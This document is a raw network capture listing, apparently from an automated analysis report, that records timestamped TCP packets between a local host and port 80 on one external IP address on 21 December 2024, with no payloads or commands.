                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.539391994 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.539424896 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.540462971 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.540558100 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.540590048 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.541560888 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.541937113 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.541969061 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.542740107 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.542773962 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.542881966 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.544060946 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.544095039 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.544096947 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.545135975 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.545166969 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.545275927 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.546355963 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.546391010 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.546391010 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.546428919 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.547519922 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.547555923 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.547671080 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.547703028 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.548736095 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.548957109 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.548985958 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.549915075 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.550060034 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.550087929 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.551162004 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.551239014 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.551297903 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.552344084 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.552580118 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.552606106 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.553555965 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.553692102 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.553718090 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.554718971 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.554892063 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.554918051 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.556015968 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.556031942 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.556080103 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.556080103 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.557085991 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.557224989 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.558904886 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.559010983 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.559041977 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.559546947 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.559632063 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.559659004 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.560729027 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.560834885 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.560863018 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.561960936 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.562026024 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.562060118 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.563122988 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.563167095 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.563250065 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.564289093 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.564423084 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.565551996 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.565582991 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.565697908 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.566690922 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.566719055 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.566783905 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.567922115 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.567950964 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.568051100 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.569088936 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.569118023 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.569205046 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.570288897 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.570302010 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.570390940 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.571500063 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.571527958 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.571702957 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.572746038 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.572777033 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.572794914 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.573920012 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.573947906 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.574270964 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.575139999 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.575170040 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.575261116 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.576355934 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.576390028 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.576478004 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.577481031 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.577512026 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.577611923 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.578704119 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.578735113 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.578823090 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.579907894 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.579940081 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.580041885 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.581088066 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.581119061 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.581202030 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.582326889 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.582354069 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.582379103 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.583549976 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.583576918 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.583622932 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.584722042 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.584752083 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.584815979 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.585942984 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.585971117 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.586056948 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.586172104 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.587074995 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.587186098 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.587212086 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.588300943 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.588447094 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.588475943 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.589473009 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.589574099 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.589608908 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.590692043 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.590727091 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.590859890 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.590889931 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.591834068 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.595947027 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.721067905 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.721174955 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.721249104 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.721573114 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.721714973 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.722707987 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.723193884 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.723246098 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.723323107 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.723376036 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.724373102 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.724428892 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.724495888 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.724575996 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.725574970 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.725718975 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.726727962 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.726754904 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.726871967 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.727041960 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.727957964 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.728037119 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.728127956 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.728240013 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.729134083 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.729237080 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.729496002 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.730302095 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.730442047 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.730472088 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.731539011 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.731616020 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.731647968 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.732670069 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.732836962 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.732867002 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.733885050 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.734015942 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.734049082 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.734802961 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.735065937 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.735222101 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.735280991 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.735281944 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.736268997 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.736413956 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.736417055 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.737449884 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.737593889 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.737632990 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.737763882 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.738656998 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.738789082 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.738817930 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.738878965 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.739859104 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.740153074 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.740780115 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.741041899 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.741156101 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.741190910 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.741295099 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.742273092 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.742348909 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.742378950 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.742464066 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.743607998 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.743683100 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.743709087 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.743908882 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.744692087 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.744848013 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.745032072 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.746113062 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.746256113 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.746273994 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.746975899 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.747142076 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.747172117 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.748214960 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.748351097 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.748389006 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.749392986 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.749624968 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.749655962 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.749836922 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.750591040 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.750720024 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.750818014 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.751827002 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.751955986 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.752099991 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.753043890 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.753153086 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.753552914 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.754157066 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.754250050 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.754286051 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.754422903 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.755325079 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.755454063 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.755484104 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.756428957 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.756529093 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.756608963 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.756748915 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.757793903 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.757894993 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.757924080 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.758107901 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.758949041 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.759027958 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.759105921 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.760118961 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.760310888 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.760468006 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.761324883 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.761413097 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.761456013 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.762572050 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.762615919 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.762658119 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.763698101 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.763730049 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.763822079 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.764182091 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.764858007 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.765014887 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.765048981 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.765167952 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.766073942 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.766207933 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.766263962 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.766263962 CET4979180192.168.2.431.41.244.11
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.767215967 CET804979131.41.244.11192.168.2.4
                                                                                                                                                                                                                                                            Dec 21, 2024 22:16:20.767347097 CET804979131.41.244.11192.168.2.4
